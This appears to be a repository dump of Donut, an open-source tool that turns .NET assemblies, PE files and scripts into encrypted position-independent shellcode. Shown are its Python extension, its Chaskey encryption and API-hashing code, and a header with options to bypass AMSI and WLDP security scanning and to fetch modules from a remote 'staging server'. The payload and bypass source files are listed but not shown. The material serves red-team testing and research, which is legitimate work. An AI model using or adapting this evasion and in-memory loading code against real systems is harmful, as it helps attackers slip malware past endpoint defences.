2 Makefile
3 Makefile.mingw
4 Makefile.msvc
5 README.md
6 donut.c
7 donutmodule.c
8 encrypt.c
9 hash.c
10 setup.py
11 version-release-notes.txt
12 ./donut.c
13 ./donutmodule.c
14 ./encrypt.c
15 ./hash.c
16 ./DonutTest/hello.c
17 ./DonutTest/testcase.c
18 ./include/mmap-windows.c
19 ./payload/activescript.c
20 ./payload/bypass.c
21 ./payload/clib.c
22 ./payload/getpc.c
23 ./payload/http_client.c
24 ./payload/inject.c
25 ./payload/inmem_dotnet.c
26 ./payload/inmem_pe.c
27 ./payload/inmem_script.c
28 ./payload/inmem_xsl.c
29 ./payload/payload.c
30 ./payload/peb.c
31 ./payload/runsc.c
32 ./payload/wscript.c
33 ./payload/exe2h/exe2h.c
34 ./payload/exe2h/mmap-windows.c
35 ./payload/test/api_test.c
36 ./payload/test/call_api_dll.c
37 ./payload/test/hello.c
38 docs/2019-08-21-Python_Extension.md
39 docs/2019-5-31-Apple-Fritter.md
40 docs/2019-5-9-Introducing-Donut.md
41 docs/api.html
42 docs/api.md
43 donut_shellcode.egg-info/PKG-INFO
44 donut_shellcode.egg-info/SOURCES.txt
45 donut_shellcode.egg-info/dependency_links.txt
46 donut_shellcode.egg-info/top_level.txt
47 donut_shellcode.egg-info/zip-safe
48 include/donut.h
49 include/encrypt.h
50 include/hash.h
51 include/mmap-windows.c
52 include/mmap.h
53 include/pe.h
54 include/poppack.h
55 include/pshpack1.h
56 include/pshpack2.h
57 include/pshpack4.h
58 include/pshpack8.h
59 include/wintypes.h
60 lib/donut.h
61 payload/Makefile.mingw
62 payload/Makefile.msvc
63 payload/activescript.c
64 payload/activescript.h
65 payload/amsi.h
66 payload/bypass.c
67 payload/call_api.asm
68 payload/call_api_bin.h
69 payload/clib.c
70 payload/clr.h
71 payload/getpc.c
72 payload/http_client.c
73 payload/inject.c
74 payload/inmem_dotnet.c
75 payload/inmem_pe.c
76 payload/inmem_script.c
77 payload/inmem_xsl.c
78 payload/order.txt
79 payload/payload.c
80 payload/payload.h
81 payload/payload_exe_x64.h
82 payload/payload_exe_x86.h
83 payload/peb.c
84 payload/peb.h
85 payload/runsc.c
86 payload/winapi.h
87 payload/wscript.c
88 payload/wscript.h
89 payload/xmldom.h
90 payload/exe2h/Makefile
91 payload/exe2h/Makefile.mingw
92 payload/exe2h/Makefile.msvc
93 payload/exe2h/exe2h.c
94 payload/exe2h/exe2h.obj
95 payload/exe2h/mmap-windows.c
96 payload/exe2h/mmap-windows.obj
97 payload/exe2h/mmap.h
98 payload/test/api_test.c
99 payload/test/call_api_dll.c
100 payload/test/hello.c
101 payload/test/hello.cs
102 payload/test/rdt.cpp
+1
-0
donut_shellcode.egg-info/dependency_links.txt less more
0
+1
-0
donut_shellcode.egg-info/top_level.txt less more
0 donut
+1
-0
donut_shellcode.egg-info/zip-safe less more
0
+150
-0
donutmodule.c less more
0 /**
1 BSD 3-Clause License
2
3 Copyright (c) 2019, TheWover, Odzhan. All rights reserved.
4
5 Python C Extension by @byt3bl33d3r
6
7 Redistribution and use in source and binary forms, with or without
8 modification, are permitted provided that the following conditions are met:
9
10 * Redistributions of source code must retain the above copyright notice, this
11 list of conditions and the following disclaimer.
12
13 * Redistributions in binary form must reproduce the above copyright notice,
14 this list of conditions and the following disclaimer in the documentation
15 and/or other materials provided with the distribution.
16
17 * Neither the name of the copyright holder nor the names of its
18 contributors may be used to endorse or promote products derived from
19 this software without specific prior written permission.
20
21 THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS "AS IS"
22 AND ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO, THE
23 IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR PURPOSE ARE
24 DISCLAIMED. IN NO EVENT SHALL THE COPYRIGHT HOLDER OR CONTRIBUTORS BE LIABLE
25 FOR ANY DIRECT, INDIRECT, INCIDENTAL, SPECIAL, EXEMPLARY, OR CONSEQUENTIAL
26 DAMAGES (INCLUDING, BUT NOT LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS OR
27 SERVICES; LOSS OF USE, DATA, OR PROFITS; OR BUSINESS INTERRUPTION) HOWEVER
28 CAUSED AND ON ANY THEORY OF LIABILITY, WHETHER IN CONTRACT, STRICT LIABILITY,
29 OR TORT (INCLUDING NEGLIGENCE OR OTHERWISE) ARISING IN ANY WAY OUT OF THE USE
30 OF THIS SOFTWARE, EVEN IF ADVISED OF THE POSSIBILITY OF SUCH DAMAGE.
31 */
32
33 #include <Python.h>
34 #include "donut.h"
35
36
37 static PyObject *Donut_Create(PyObject *self, PyObject *args, PyObject *keywds) {
38 int *arch = NULL;
39 int *bypass = NULL;
40 char *appdomain = NULL;
41 char *file = NULL;
42 char *runtime = NULL;
43 char *url = NULL;
44 char *cls = NULL;
45 char *method = NULL;
46 char *params = NULL;
47
48 int err;
49
50 static char *kwlist[] = {"file", "url", "arch", "bypass", "cls", "method", "params", "runtime", "appdomain", NULL};
51 if (!PyArg_ParseTupleAndKeywords(args, keywds, "s|siisssss", kwlist, &file, &url, &arch, &bypass, &cls, &method, &params, &runtime, &appdomain)) {
52 return NULL;
53 }
54
55 DONUT_CONFIG c;
56
57 // zero initialize configuration
58 memset(&c, 0, sizeof(c));
59
60 // default type is position independent code for dual-mode (x86 + amd64)
61 c.inst_type = DONUT_INSTANCE_PIC;
62 c.arch = DONUT_ARCH_X84;
63 c.bypass = DONUT_BYPASS_CONTINUE; // continues loading even if disabling AMSI/WLDP fails
64
65 // target cpu architecture
66 if (arch != NULL) {
67 c.arch = arch;
68 }
69
70 // bypass options
71 if (bypass != NULL) {
72 c.bypass = bypass;
73 }
74
75 // name of appdomain to use
76 if (appdomain != NULL) {
77 strncpy(c.domain, appdomain, DONUT_MAX_NAME - 1);
78 }
79
80 // assembly to use
81 if (file != NULL) {
82 strncpy(c.file, file, DONUT_MAX_NAME - 1);
83 }
84
85 //runtime version to use
86 if (runtime != NULL) {
87 strncpy(c.runtime, runtime, DONUT_MAX_NAME - 1);
88 }
89
90 // url of remote assembly
91 if (url != NULL) {
92 strncpy(c.url, url, DONUT_MAX_URL - 2);
93 c.inst_type = DONUT_INSTANCE_URL;
94 }
95
96 // class
97 if (cls != NULL) {
98 strncpy(c.cls, cls, DONUT_MAX_NAME - 1);
99 }
100
101 // method or exported api symbol
102 if (method != NULL) {
103 strncpy(c.method, method, DONUT_MAX_NAME - 1);
104 }
105
106 // parameters to method/exported API
107 if (params != NULL) {
108 strncpy(c.param, params, sizeof(c.param) - 1);
109 }
110
111 err = DonutCreate(&c);
112
113 /*
114 if (!(c.pic_len > 0)) {
115 return NULL;
116 }
117 */
118
119 PyObject *shellcode = Py_BuildValue("y#", c.pic, c.pic_len);
120
121 DonutDelete(&c);
122
123 return shellcode;
124 }
125
126 // module's function table
127 static PyMethodDef Donut_FunctionsTable[] = {
128 {
129 "create", // name exposed to Python
130 Donut_Create, // C wrapper function
131 METH_VARARGS|METH_KEYWORDS,
132 "Calls DonutCreate to generate shellcode for a .NET assembly" // documentation
133 }, {
134 NULL, NULL, 0, NULL
135 }
136 };
137
138 // modules definition
139 static struct PyModuleDef Donut_Module = {
140 PyModuleDef_HEAD_INIT,
141 "donut", // name of module exposed to Python
142 "Donut Python C extension", // module documentation
143 -1,
144 Donut_FunctionsTable
145 };
146
147 PyMODINIT_FUNC PyInit_donut(void) {
148 return PyModule_Create(&Donut_Module);
149 }
+119
-0
encrypt.c less more
0 /**
1 BSD 3-Clause License
2
3 Copyright (c) 2019, TheWover, Odzhan. All rights reserved.
4
5 Redistribution and use in source and binary forms, with or without
6 modification, are permitted provided that the following conditions are met:
7
8 * Redistributions of source code must retain the above copyright notice, this
9 list of conditions and the following disclaimer.
10
11 * Redistributions in binary form must reproduce the above copyright notice,
12 this list of conditions and the following disclaimer in the documentation
13 and/or other materials provided with the distribution.
14
15 * Neither the name of the copyright holder nor the names of its
16 contributors may be used to endorse or promote products derived from
17 this software without specific prior written permission.
18
19 THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS "AS IS"
20 AND ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO, THE
21 IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR PURPOSE ARE
22 DISCLAIMED. IN NO EVENT SHALL THE COPYRIGHT HOLDER OR CONTRIBUTORS BE LIABLE
23 FOR ANY DIRECT, INDIRECT, INCIDENTAL, SPECIAL, EXEMPLARY, OR CONSEQUENTIAL
24 DAMAGES (INCLUDING, BUT NOT LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS OR
25 SERVICES; LOSS OF USE, DATA, OR PROFITS; OR BUSINESS INTERRUPTION) HOWEVER
26 CAUSED AND ON ANY THEORY OF LIABILITY, WHETHER IN CONTRACT, STRICT LIABILITY,
27 OR TORT (INCLUDING NEGLIGENCE OR OTHERWISE) ARISING IN ANY WAY OUT OF THE USE
28 OF THIS SOFTWARE, EVEN IF ADVISED OF THE POSSIBILITY OF SUCH DAMAGE.
29 */
30
31 #include "encrypt.h"
32
33 static void chaskey(void *mk, void *p) {
34 uint32_t i,*w=p,*k=mk;
35
36 // add 128-bit master key
37 for(i=0;i<4;i++) w[i]^=k[i];
38
39 // apply 16 rounds of permutation
40 for(i=0;i<16;i++) {
41 w[0] += w[1],
42 w[1] = ROTR32(w[1], 27) ^ w[0],
43 w[2] += w[3],
44 w[3] = ROTR32(w[3], 24) ^ w[2],
45 w[2] += w[1],
46 w[0] = ROTR32(w[0], 16) + w[3],
47 w[3] = ROTR32(w[3], 19) ^ w[0],
48 w[1] = ROTR32(w[1], 25) ^ w[2],
49 w[2] = ROTR32(w[2], 16);
50 }
51 // add 128-bit master key
52 for(i=0;i<4;i++) w[i]^=k[i];
53 }
54
55 // encrypt/decrypt data in counter mode
56 void donut_encrypt(void *mk, void *ctr, void *data, size_t len) {
57 uint8_t x[CIPHER_BLK_LEN],
58 *p=(uint8_t*)data,
59 *c=(uint8_t*)ctr;
60 int i, r;
61
62 while(len) {
63 // copy counter+nonce to local buffer
64 for(i=0;i<CIPHER_BLK_LEN;i++)
65 x[i] = c[i];
66
67 // donut_encrypt x
68 ENCRYPT(mk, &x);
69
70 // XOR plaintext with ciphertext
71 r = len > CIPHER_BLK_LEN ? CIPHER_BLK_LEN : len;
72
73 for(i=0;i<r;i++)
74 p[i] ^= x[i];
75
76 // update length + position
77 len -= r; p += r;
78
79 // update counter
80 for(i=CIPHER_BLK_LEN;i>0;i--)
81 if(++c[i-1]) break;
82 }
83 }
84
85 #ifdef TEST
86
87 #include <stdio.h>
88 #include <string.h>
89 #include <stdint.h>
90
91 // 128-bit master key
92 uint8_t key[16] =
93 { 0x56, 0x09, 0xe9, 0x68, 0x5f, 0x58, 0xe3, 0x29,
94 0x40, 0xec, 0xec, 0x98, 0xc5, 0x22, 0x98, 0x2f };
95
96 // 128-bit plain text
97 uint8_t plain[16]=
98 { 0xb8, 0x23, 0x28, 0x26, 0xfd, 0x5e, 0x40, 0x5e,
99 0x69, 0xa3, 0x01, 0xa9, 0x78, 0xea, 0x7a, 0xd8 };
100
101 // 128-bit cipher text
102 uint8_t cipher[16] =
103 { 0xd5, 0x60, 0x8d, 0x4d, 0xa2, 0xbf, 0x34, 0x7b,
104 0xab, 0xf8, 0x77, 0x2f, 0xdf, 0xed, 0xde, 0x07 };
105
106 int main(void) {
107 uint8_t data[16];
108 int equ;
109
110 memcpy(data, plain, 16);
111 chaskey(key, data);
112 equ = (memcmp(data, cipher, 16)==0);
113 printf("Chaskey test : %s\n", equ ? "OK" : "FAILED");
114 return 0;
115 }
116
117 #endif
118
+140
-0
hash.c less more
0 /**
1 BSD 3-Clause License
2
3 Copyright (c) 2017 Odzhan. All rights reserved.
4
5 Redistribution and use in source and binary forms, with or without
6 modification, are permitted provided that the following conditions are met:
7
8 * Redistributions of source code must retain the above copyright notice, this
9 list of conditions and the following disclaimer.
10
11 * Redistributions in binary form must reproduce the above copyright notice,
12 this list of conditions and the following disclaimer in the documentation
13 and/or other materials provided with the distribution.
14
15 * Neither the name of the copyright holder nor the names of its
16 contributors may be used to endorse or promote products derived from
17 this software without specific prior written permission.
18
19 THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS "AS IS"
20 AND ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO, THE
21 IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR PURPOSE ARE
22 DISCLAIMED. IN NO EVENT SHALL THE COPYRIGHT HOLDER OR CONTRIBUTORS BE LIABLE
23 FOR ANY DIRECT, INDIRECT, INCIDENTAL, SPECIAL, EXEMPLARY, OR CONSEQUENTIAL
24 DAMAGES (INCLUDING, BUT NOT LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS OR
25 SERVICES; LOSS OF USE, DATA, OR PROFITS; OR BUSINESS INTERRUPTION) HOWEVER
26 CAUSED AND ON ANY THEORY OF LIABILITY, WHETHER IN CONTRACT, STRICT LIABILITY,
27 OR TORT (INCLUDING NEGLIGENCE OR OTHERWISE) ARISING IN ANY WAY OUT OF THE USE
28 OF THIS SOFTWARE, EVEN IF ADVISED OF THE POSSIBILITY OF SUCH DAMAGE.
29 */
30
31 #include "hash.h"
32
33 // SPECK-64/128
34 static uint64_t speck(void *mk, uint64_t p) {
35 uint32_t k[4], i, t;
36 union {
37 uint32_t w[2];
38 uint64_t q;
39 } x;
40
41 // copy 64-bit plaintext to local buffer
42 x.q = p;
43
44 // copy 128-bit master key to local buffer
45 for(i=0;i<4;i++) k[i]=((uint32_t*)mk)[i];
46
47 for(i=0;i<27;i++) {
48 // encrypt 64-bit plaintext
49 x.w[0] = (ROTR32(x.w[0], 8) + x.w[1]) ^ k[0];
50 x.w[1] = ROTR32(x.w[1],29) ^ x.w[0];
51
52 // create next 32-bit subkey
53 t = k[3];
54 k[3] = (ROTR32(k[1], 8) + k[0]) ^ i;
55 k[0] = ROTR32(k[0],29) ^ k[3];
56 k[1] = k[2]; k[2] = t;
57 }
58 // return 64-bit ciphertext
59 return x.q;
60 }
61
62 uint64_t maru(const void *input, uint64_t iv) {
63 uint64_t h;
64 uint32_t len, idx, end;
65 const char *api = (const char*)input;
66
67 union {
68 uint8_t b[MARU_BLK_LEN];
69 uint32_t w[MARU_BLK_LEN/4];
70 } m;
71
72 // set H to initial value
73 h = iv;
74
75 for(idx=0, len=0, end=0;!end;) {
76 // end of string or max len?
77 if(api[len] == 0 || len == MARU_MAX_STR) {
78 // zero remainder of M
79 Memset(&m.b[idx], 0, MARU_BLK_LEN - idx);
80 // store the end bit
81 m.b[idx] = 0x80;
82 // have we space in M for api length?
83 if(idx >= MARU_BLK_LEN - 4) {
84 // no, update H with E
85 h ^= MARU_CRYPT(&m, h);
86 // zero M
87 Memset(&m, 0, MARU_BLK_LEN);
88 }
89 // store total length in bits
90 m.w[(MARU_BLK_LEN/4)-1] = (len * 8);
91 idx = MARU_BLK_LEN;
92 end++;
93 } else {
94 // store character from api string
95 m.b[idx] = (uint8_t)api[len];
96 idx++; len++;
97 }
98 if(idx == MARU_BLK_LEN) {
99 // update H with E
100 h ^= MARU_CRYPT(&m, h);
101 // reset idx
102 idx = 0;
103 }
104 }
105 return h;
106 }
107
108 #ifdef TEST
109
110 #include <stdio.h>
111 #include <stdlib.h>
112 #include <string.h>
113
114 int main(int argc, char *argv[]) {
115
116 uint64_t ulDllHash, ulApiHash, iv;
117 char *api, *dll;
118
119 if(argc != 4) {
120 printf("\nusage: maru <iv> <dll> <api>\n");
121 return 0;
122 }
123
124 // convert hexadecimal IV to binary
125 iv = strtoull(argv[1], NULL, 16);
126 dll = argv[2];
127 api = argv[3];
128
129 printf("\nIV : %p\n", (void*)iv);
130
131 ulDllHash = maru(dll, iv);
132 printf("DLL : %p\n", (void*)ulDllHash);
133
134 ulApiHash = maru(api, iv) + ulDllHash;
135 printf("API : %p\n", (void*)ulApiHash);
136
137 return 0;
138 }
139 #endif
+383
-0
include/donut.h less more
0 /**
1 BSD 3-Clause License
2
3 Copyright (c) 2019, TheWover, Odzhan. All rights reserved.
4
5 Redistribution and use in source and binary forms, with or without
6 modification, are permitted provided that the following conditions are met:
7
8 * Redistributions of source code must retain the above copyright notice, this
9 list of conditions and the following disclaimer.
10
11 * Redistributions in binary form must reproduce the above copyright notice,
12 this list of conditions and the following disclaimer in the documentation
13 and/or other materials provided with the distribution.
14
15 * Neither the name of the copyright holder nor the names of its
16 contributors may be used to endorse or promote products derived from
17 this software without specific prior written permission.
18
19 THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS "AS IS"
20 AND ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO, THE
21 IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR PURPOSE ARE
22 DISCLAIMED. IN NO EVENT SHALL THE COPYRIGHT HOLDER OR CONTRIBUTORS BE LIABLE
23 FOR ANY DIRECT, INDIRECT, INCIDENTAL, SPECIAL, EXEMPLARY, OR CONSEQUENTIAL
24 DAMAGES (INCLUDING, BUT NOT LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS OR
25 SERVICES; LOSS OF USE, DATA, OR PROFITS; OR BUSINESS INTERRUPTION) HOWEVER
26 CAUSED AND ON ANY THEORY OF LIABILITY, WHETHER IN CONTRACT, STRICT LIABILITY,
27 OR TORT (INCLUDING NEGLIGENCE OR OTHERWISE) ARISING IN ANY WAY OUT OF THE USE
28 OF THIS SOFTWARE, EVEN IF ADVISED OF THE POSSIBILITY OF SUCH DAMAGE.
29 */
30
31 #ifndef DONUT_H
32 #define DONUT_H
33
34 #include <stdint.h>
35 #include <stdio.h>
36 #include <stdlib.h>
37 #include <string.h>
38 #include <sys/stat.h>
39 #include <inttypes.h>
40 #include <fcntl.h>
41
42 #if defined(_WIN32) || defined(_WIN64)
43 #define WINDOWS
44 #include <windows.h>
45 #ifndef PAYLOAD_H
46 #include "mmap.h"
47 #endif
48 #if defined(_MSC_VER)
49 #pragma comment(lib, "advapi32.lib")
50 #endif
51 #else
52 #define LINUX
53 #include <unistd.h>
54 #include <sys/types.h>
55 #include <sys/mman.h>
56 #include "pe.h"
57 #endif
58
59 #ifndef PAYLOAD_H
60
61 #if defined(DEBUG)
62 #define DPRINT(...) { \
63 fprintf(stderr, "DEBUG: %s:%d:%s(): ", __FILE__, __LINE__, __FUNCTION__); \
64 fprintf(stderr, __VA_ARGS__); \
65 fprintf(stderr, "\n"); \
66 }
67 #else
68 #define DPRINT(...) // Don't do anything in release builds
69 #endif
70
71 #endif
72
73 #if !defined(NOCRYPTO)
74 #include "hash.h" // api hashing
75 #include "encrypt.h" // symmetric encryption of instance+module
76 #endif
77
78 #if !defined(WINDOWS)
79 #define strnicmp(x,y,z) strncasecmp(x,y,z)
80 typedef uint64_t ULONG64, *PULONG64;
81 typedef uint32_t DWORD, *PDWORD;
82 typedef uint16_t WORD, *PWORD;
83 typedef uint8_t BYTE, *PBYTE;
84
85 typedef char CHAR, *PCHAR;
86 typedef size_t SIZE_T;
87
88 typedef struct _GUID {
89 DWORD Data1;
90 WORD Data2;
91 WORD Data3;
92 BYTE Data4[8];
93 } GUID;
94 #endif
95
96 #define DONUT_KEY_LEN CIPHER_KEY_LEN
97 #define DONUT_BLK_LEN CIPHER_BLK_LEN
98
99 #define DONUT_ERROR_SUCCESS 0
100 #define DONUT_ERROR_FILE_NOT_FOUND 1
101 #define DONUT_ERROR_FILE_EMPTY 2
102 #define DONUT_ERROR_FILE_ACCESS 3
103 #define DONUT_ERROR_FILE_INVALID 4
104 #define DONUT_ERROR_NET_PARAMS 5
105 #define DONUT_ERROR_NO_MEMORY 6
106 #define DONUT_ERROR_INVALID_ARCH 7
107 #define DONUT_ERROR_INVALID_URL 8
108 #define DONUT_ERROR_URL_LENGTH 9
109 #define DONUT_ERROR_INVALID_PARAMETER 10
110 #define DONUT_ERROR_RANDOM 11
111 #define DONUT_ERROR_DLL_FUNCTION 12
112 #define DONUT_ERROR_ARCH_MISMATCH 13
113 #define DONUT_ERROR_DLL_PARAM 14
114 #define DONUT_ERROR_BYPASS_INVALID 15
115
116 // target architecture
117 #define DONUT_ARCH_ANY -1 // just for vbs,js and xsl files
118 #define DONUT_ARCH_X86 1 // x86
119 #define DONUT_ARCH_X64 2 // AMD64
120 #define DONUT_ARCH_X84 3 // AMD64 + x86
121
122 // module type
123 #define DONUT_MODULE_NET_DLL 1 // .NET DLL. Requires class and method
124 #define DONUT_MODULE_NET_EXE 2 // .NET EXE. Executes Main if no class and method provided
125 #define DONUT_MODULE_DLL 3 // Unmanaged DLL, function is optional
126 #define DONUT_MODULE_EXE 4 // Unmanaged EXE
127 #define DONUT_MODULE_VBS 5 // VBScript
128 #define DONUT_MODULE_JS 6 // JavaScript or JScript
129 #define DONUT_MODULE_XSL 7 // XSL with JavaScript/JScript or VBscript embedded
130
131 // instance type
132 #define DONUT_INSTANCE_PIC 1 // Self-contained
133 #define DONUT_INSTANCE_URL 2 // Download from remote server
134
135 // AMSI/WLDP options
136 #define DONUT_BYPASS_SKIP 1 // Disables bypassing AMSI/WDLP
137 #define DONUT_BYPASS_ABORT 2 // If bypassing AMSI/WLDP fails, the loader stops running
138 #define DONUT_BYPASS_CONTINUE 3 // If bypassing AMSI/WLDP fails, the loader continues running
139
140 // apparently C# can support 2^16 or 65,536 parameters
141 // we support up to eight for now :)
142 // Changing these would require updating call_api.asm for unmanaged EXE/DLL
143 #define DONUT_MAX_PARAM 8 // maximum number of parameters passed to method
144 #define DONUT_MAX_NAME 256 // maximum length of string for domain, class, method and parameter names
145 #define DONUT_MAX_DLL 8 // maximum number of DLL supported by instance
146 #define DONUT_MAX_URL 256
147 #define DONUT_MAX_MODNAME 8
148 #define DONUT_SIG_LEN 8 // 64-bit string to verify decryption ok
149 #define DONUT_VER_LEN 32
150 #define DONUT_DOMAIN_LEN 8
151
152 #define DONUT_RUNTIME_NET2 "v2.0.50727"
153 #define DONUT_RUNTIME_NET4 "v4.0.30319"
154
155 #define NTDLL_DLL "ntdll.dll"
156 #define KERNEL32_DLL "kernel32.dll"
157 #define ADVAPI32_DLL "advapi32.dll"
158 #define CRYPT32_DLL "crypt32.dll"
159 #define MSCOREE_DLL "mscoree.dll"
160 #define OLE32_DLL "ole32.dll"
161 #define OLEAUT32_DLL "oleaut32.dll"
162 #define WININET_DLL "wininet.dll"
163 #define COMBASE_DLL "combase.dll"
164 #define USER32_DLL "user32.dll"
165 #define SHLWAPI_DLL "shlwapi.dll"
166
167 // Per the ECMA spec, the section data looks like this:
168 // taken from https://github.com/dotnet/coreclr/
169 //
170 typedef struct tagMDSTORAGESIGNATURE {
171 ULONG lSignature; // "Magic" signature.
172 USHORT iMajorVer; // Major file version.
173 USHORT iMinorVer; // Minor file version.
174 ULONG iExtraData; // Offset to next structure of information
175 ULONG iVersionString; // Length of version string
176 BYTE pVersion[0]; // Version string
177 } MDSTORAGESIGNATURE, *PMDSTORAGESIGNATURE;
178
179 //
180 typedef struct _file_info_t {
181 int fd;
182 uint64_t size;
183 uint8_t *map;
184
185 // the following are set for unmanaged or .NET PE/DLL files
186 int type;
187 int arch;
188 char ver[DONUT_VER_LEN];
189 } file_info;
190
191 typedef struct _API_IMPORT {
192 const char *module;
193 const char *name;
194 } API_IMPORT, *PAPI_IMPORT;
195
196 typedef struct _DONUT_CRYPT {
197 BYTE mk[DONUT_KEY_LEN]; // master key
198 BYTE ctr[DONUT_BLK_LEN]; // counter + nonce
199 } DONUT_CRYPT, *PDONUT_CRYPT;
200
201 // everything required for a module goes in the following structure
202 typedef struct _DONUT_MODULE {
203 DWORD type; // EXE, DLL, JS, VBS, XSL
204 WCHAR runtime[DONUT_MAX_NAME]; // runtime version for .NET EXE/DLL
205 WCHAR domain[DONUT_MAX_NAME]; // domain name to use for .NET EXE/DLL
206 WCHAR cls[DONUT_MAX_NAME]; // name of class and optional namespace for .NET EXE/DLL
207 WCHAR method[DONUT_MAX_NAME]; // name of method to invoke for .NET DLL or api for unmanaged DLL
208 DWORD param_cnt; // number of parameters for DLL/EXE
209 WCHAR param[DONUT_MAX_PARAM][DONUT_MAX_NAME]; // string parameters for DLL/EXE
210 CHAR sig[DONUT_MAX_NAME]; // random string to verify decryption
211 ULONG64 mac; // to verify decryption was ok
212 ULONG64 len; // size of EXE/DLL/XSL/JS/VBS file
213 BYTE data[4]; // data of EXE/DLL/XSL/JS/VBS file
214 } DONUT_MODULE, *PDONUT_MODULE;
215
216 // everything required for an instance goes into the following structure
217 typedef struct _DONUT_INSTANCE {
218 uint32_t len; // total size of instance
219 DONUT_CRYPT key; // decrypts instance
220
221 uint64_t iv; // the 64-bit initial value for maru hash
222
223 union {
224 uint64_t hash[64]; // holds up to 64 api hashes
225 void *addr[64]; // holds up to 64 api addresses
226 // include prototypes only if header included from payload.h
227 #ifdef PAYLOAD_H
228 struct {
229 // imports from kernel32.dll or kernelbase.dll
230 LoadLibraryA_t LoadLibraryA;
231 GetProcAddress_t GetProcAddress;
232 GetModuleHandleA_t GetModuleHandleA;
233 VirtualAlloc_t VirtualAlloc; // required to allocate RW memory for instance
234 VirtualFree_t VirtualFree;
235 VirtualQuery_t VirtualQuery;
236 VirtualProtect_t VirtualProtect;
237 Sleep_t Sleep;
238 MultiByteToWideChar_t MultiByteToWideChar;
239 GetUserDefaultLCID_t GetUserDefaultLCID;
240
241 // imports from oleaut32.dll
242 SafeArrayCreate_t SafeArrayCreate;
243 SafeArrayCreateVector_t SafeArrayCreateVector;
244 SafeArrayPutElement_t SafeArrayPutElement;
245 SafeArrayDestroy_t SafeArrayDestroy;
246 SafeArrayGetLBound_t SafeArrayGetLBound;
247 SafeArrayGetUBound_t SafeArrayGetUBound;
248 SysAllocString_t SysAllocString;
249 SysFreeString_t SysFreeString;
250 LoadTypeLib_t LoadTypeLib;
251
252 // imports from wininet.dll
253 InternetCrackUrl_t InternetCrackUrl;
254 InternetOpen_t InternetOpen;
255 InternetConnect_t InternetConnect;
256 InternetSetOption_t InternetSetOption;
257 InternetReadFile_t InternetReadFile;
258 InternetCloseHandle_t InternetCloseHandle;
259 HttpOpenRequest_t HttpOpenRequest;
260 HttpSendRequest_t HttpSendRequest;
261 HttpQueryInfo_t HttpQueryInfo;
262
263 // imports from mscoree.dll
264 CorBindToRuntime_t CorBindToRuntime;
265 CLRCreateInstance_t CLRCreateInstance;
266
267 // imports from ole32.dll
268 CoInitializeEx_t CoInitializeEx;
269 CoCreateInstance_t CoCreateInstance;
270 CoUninitialize_t CoUninitialize;
271 };
272 #endif
273 } api;
274
275 // everything from here is encrypted
276 int api_cnt; // the 64-bit hashes of API required for instance to work
277 int dll_cnt; // the number of DLL to load before resolving API
278 char dll_name[DONUT_MAX_DLL][32]; // a list of DLL strings to load
279
280 union {
281 char s[8]; // amsi.dll
282 uint32_t w[2];
283 } amsi;
284
285 int bypass; // indicates behaviour of byassing AMSI/WLDP
286 char clr[8]; // clr.dll
287 char wldp[16]; // wldp.dll
288 char wldpQuery[32]; // WldpQueryDynamicCodeTrust
289 char wldpIsApproved[32]; // WldpIsClassInApprovedList
290 char amsiInit[16]; // AmsiInitialize
291 char amsiScanBuf[16]; // AmsiScanBuffer
292 char amsiScanStr[16]; // AmsiScanString
293
294 uint16_t wscript[8]; // WScript
295 uint16_t wscript_exe[16]; // wscript.exe
296
297 GUID xIID_IUnknown;
298 GUID xIID_IDispatch;
299
300 // GUID required to load .NET assemblies
301 GUID xCLSID_CLRMetaHost;
302 GUID xIID_ICLRMetaHost;
303 GUID xIID_ICLRRuntimeInfo;
304 GUID xCLSID_CorRuntimeHost;
305 GUID xIID_ICorRuntimeHost;
306 GUID xIID_AppDomain;
307
308 // GUID required to run VBS and JS files
309 GUID xCLSID_ScriptLanguage; // vbs or js
310 GUID xIID_IHost; // wscript object
311 GUID xIID_IActiveScript; // engine
312 GUID xIID_IActiveScriptSite; // implementation
313 GUID xIID_IActiveScriptParse32; // parser
314 GUID xIID_IActiveScriptParse64;
315
316 // GUID required to run XSL files
317 GUID xCLSID_DOMDocument30;
318 GUID xIID_IXMLDOMDocument;
319 GUID xIID_IXMLDOMNode;
320
321 int type; // DONUT_INSTANCE_PIC or DONUT_INSTANCE_URL
322
323 struct {
324 char url[DONUT_MAX_URL]; // staging server hosting donut module
325 char req[8]; // just a buffer for "GET"
326 } http;
327
328 uint8_t sig[DONUT_MAX_NAME]; // string to hash
329 uint64_t mac; // to verify decryption ok
330
331 DONUT_CRYPT mod_key; // used to decrypt module
332 uint64_t mod_len; // total size of module
333
334 union {
335 PDONUT_MODULE p; // for URL
336 DONUT_MODULE x; // for PIC
337 } module;
338 } DONUT_INSTANCE, *PDONUT_INSTANCE;
339
340 typedef struct _DONUT_CONFIG {
341 int arch; // target architecture for shellcode
342 int bypass; // bypass option for AMSI/WDLP
343 char domain[DONUT_MAX_NAME]; // name of domain to create for assembly
344 char cls[DONUT_MAX_NAME]; // name of class and optional namespace
345 char method[DONUT_MAX_NAME]; // name of method to execute
346 char param[(DONUT_MAX_PARAM+1)*DONUT_MAX_NAME]; // string parameters passed to method, separated by comma or semi-colon
347 char file[DONUT_MAX_NAME]; // assembly to create module from
348 char url[DONUT_MAX_URL]; // points to root path of where module will be on remote http server
349 char runtime[DONUT_MAX_NAME]; // runtime version to use.
350 char modname[DONUT_MAX_NAME]; // name of module written to disk
351
352 int mod_type; // DONUT_MODULE_DLL or DONUT_MODULE_EXE
